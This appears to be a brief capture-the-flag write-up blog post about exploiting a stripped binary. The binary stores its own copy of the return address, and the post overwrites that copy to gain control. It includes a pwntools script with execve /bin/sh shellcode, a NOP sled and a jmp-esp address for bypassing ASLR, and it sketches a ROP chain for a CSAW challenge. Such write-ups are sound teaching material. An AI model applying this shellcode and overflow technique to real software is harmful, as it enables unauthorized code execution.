Blog
This binary had no protection assuming aslr to be on , it is ripped binary . It had it's own protection mechanism .. it saves the retaddr in a memory location
and restores it back .. so our goal is to overwrite the mem loc and not the saved eip .. after finding offset of that mem loc we can control eip ...
to execute to our shellcode we need to bypass the aslr by using jmp esp instruction
from pwn import *
shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
nop_sled="\x90"*(417-len(shellcode))
payload=nop_sled+shellcode+pack(0x80e7e53)
p=process('miteegashun')
msg=p.recvlines(2)
print msg
p.send(payload)
p.interactive()
IN csaw 300 question there is no jmp esp inst but we can call read fun and store it static mem location ..
read + pop3ret + fd + static + p32(2) + static + "\x90" * 100 + SHELLCODE
send("\xff\xe4") # opcode for jmp esp